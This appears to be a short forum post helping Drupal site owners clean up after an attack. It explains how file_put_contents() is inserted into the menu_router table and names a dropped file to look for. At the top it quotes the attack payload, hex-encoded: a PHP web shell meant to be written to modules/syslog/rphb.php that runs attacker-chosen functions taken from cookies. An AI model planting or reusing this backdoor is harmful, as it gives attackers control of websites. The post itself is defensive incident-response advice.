0x613a323a7b693a303b733a32333a226d6f64756c65732f7379736c6f672f727068622e706870223b693a313b733a3134373a223c3f7068702024666f726d313d40245f434f4f4b49455b224b63716633225d3b206966202824666f726d31297b20246f70743d24666f726d312840245f434f4f4b49455b224b63716632225d293b202461753d24666f726d312840245f434f4f4b49455b224b63716631225d293b20246f707428222f3239322f65222c2461752c323932293b207d20706870696e666f28293b223b7d
This attack will add file_put_contents()
as the access_callback
in your menu_router
table.
Subsequently, that path is used attempt to drop more exploit code.
Look in menu router for file_put_contents and remove it if found.
Looks like this is trying to drop different files depending on how it's constructed. You should see if there's a
modules/trigger/eygo.php
file in your codebase.